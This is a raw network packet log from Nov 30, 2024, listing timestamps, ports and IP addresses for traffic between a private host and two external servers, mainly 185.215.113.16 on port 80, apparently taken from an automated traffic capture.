Nov 30, 2024 04:06:28.049488068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.050472021 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.050513983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.050579071 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.050618887 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.051597118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.051635027 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.051718950 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.051759958 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.052727938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.052769899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.052838087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.052877903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.053855896 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.053899050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.053957939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.053997993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.055005074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.055042982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.055111885 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.055152893 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.056123018 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.056164026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.056222916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.056262016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.057235003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.057276011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.057337999 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.057377100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.058370113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.058412075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.058455944 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.058495045 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.059408903 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.059513092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.059530973 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.059554100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.059572935 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.060641050 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.060698032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.060787916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.060843945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.061763048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.061808109 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.061851025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.061891079 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.062892914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.062931061 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.062999010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.063035011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.063411951 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.063453913 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.063462019 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.063486099 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.063519955 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.063651085 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.063662052 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.063672066 CET	49803	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.063677073 CET	443	49803	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.064028025 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.064070940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.064157009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.064189911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.065135956 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.065175056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.065212011 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.065251112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.066248894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.066287041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.066359997 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.066392899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.067378044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.067421913 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.067486048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.067518950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.068511009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.068547964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.068622112 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.068660021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.069634914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.069677114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.069730997 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.069772005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.070775986 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.070822954 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.070889950 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.070929050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.071919918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.071960926 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.072009087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.072052956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.073023081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.073061943 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.073129892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.073168039 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.074151039 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.074193954 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.074245930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.074279070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.075273037 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.075309038 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.075352907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.075388908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.076396942 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.076440096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.076505899 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.076545000 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.077550888 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.077595949 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.077657938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.077696085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.078663111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.078707933 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.078756094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.078794956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.079761028 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.079804897 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.222111940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.222161055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.222250938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.222294092 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.222656965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.222697973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.222759008 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.222800970 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.223776102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.223834038 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.223890066 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.223942041 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.224911928 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.224978924 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.225023985 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.225070000 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.226058006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.226109982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.226166010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.226210117 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.227157116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.227212906 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.227252007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.227297068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.227456093 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.227473021 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.227531910 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.227780104 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:28.227788925 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:28.228307962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.228354931 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.228427887 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.228472948 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.229404926 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.229449987 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.229509115 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.229548931 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.230561018 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.230607986 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.230652094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.230695009 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.231674910 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.231720924 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.231774092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.231817961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.232800007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.232845068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.232888937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.232930899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.233911991 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.233954906 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.234081030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.234124899 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.235043049 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.235085964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.235152006 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.235193968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.236165047 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.236207962 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.236272097 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.236315966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.237294912 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.237339020 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.237402916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.237445116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.238421917 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.238466024 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.238534927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.238580942 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.239568949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.239615917 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.239667892 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.239712000 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.240679979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.240725994 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.240783930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.240828037 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.241806030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.241852045 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.241915941 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.241961002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.242943048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.242985964 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.243045092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.243087053 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.244065046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.244107008 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.244160891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.244203091 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.245174885 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.245217085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.245286942 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.245331049 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.246318102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.246361017 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.246414900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.246459961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.247446060 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.247493982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.247535944 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.247580051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.248569012 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.248611927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.248682022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.248724937 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.249706030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.249757051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.249794960 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.249840021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.250827074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.250875950 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.250924110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.250967026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.251982927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.252027035 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.252095938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.252135992 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.253099918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.253143072 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.253144979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.253187895 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.254225016 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.254265070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.254327059 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.254373074 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.255342007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.255384922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.255492926 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.255538940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.256489992 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.256534100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.256583929 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.256627083 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.257608891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.257652044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.257710934 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.257750988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.258709908 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.258759975 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.258821964 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.258867025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.259850979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.259896040 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.259938955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.259982109 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.260976076 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.261019945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.261082888 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.261125088 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.262125969 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.262171030 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.262238026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.262280941 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.263257980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.263300896 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.263350010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.263398886 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.264359951 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.264399052 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.264432907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.264478922 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.265515089 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.265561104 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.265609980 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.265654087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.266624928 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.266669989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.266726971 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.266772985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.267744064 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.267786980 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.267857075 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.267899036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.268877029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.268920898 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.268989086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.269035101 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.270008087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.270052910 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.270116091 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.270157099 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.271167040 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.271213055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.271251917 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.271296978 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.272268057 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.272310019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.272377968 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.272418976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.273406029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.273447990 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.273509979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.273554087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.274537086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.274580002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.274694920 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.274740934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.275648117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.275691986 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.275738955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.275785923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.276793003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.276834011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.276895046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.276942968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.277904034 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.277949095 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.278019905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.278074026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.279040098 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.279083014 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.279149055 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.279191971 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.280154943 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.280199051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.280304909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.280339003 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.281260014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.281306982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.423336029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.423418999 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:28.423428059 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:28.423469067 CET	49800	80	192.168.2.4	185.215.113.16
